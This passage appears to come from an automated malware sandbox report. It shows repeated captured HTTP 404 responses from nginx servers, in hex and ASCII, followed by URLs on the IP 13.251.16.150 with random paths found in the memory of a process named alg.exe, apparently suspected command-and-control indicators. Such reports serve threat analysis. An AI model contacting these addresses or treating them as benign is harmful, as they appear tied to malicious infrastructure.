69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:26:41 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:26:41 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:26:49 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:26:49 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:26:58 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:26:58 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:27:06 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:27:06 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.27.2Date: Fri, 01 Nov 2024 07:27:08 GMTTransfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=20Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Source: alg.exe, 00000010.00000003.2044644305.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2044644305.000000000057B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/
Source: alg.exe, 00000010.00000003.2044644305.0000000000541000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2044644305.00000000005AE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/fkcgbfiiatbbgsse
Source: alg.exe, 00000010.00000003.2946550482.00000000005D4000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2943510653.00000000005CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/rfuetphopheyd5e
Source: alg.exe, 00000010.00000003.2431778883.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/xgyulldvremqd
Source: alg.exe, 00000010.00000003.2431778883.00000000005CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150/xgyulldvremqdsJiM4
Source: alg.exe, 00000010.00000003.2079470414.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2066991172.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2044644305.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2054624676.0000000000596000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://13.251.16.150:80/fkcgbfiiatbbgsseZ
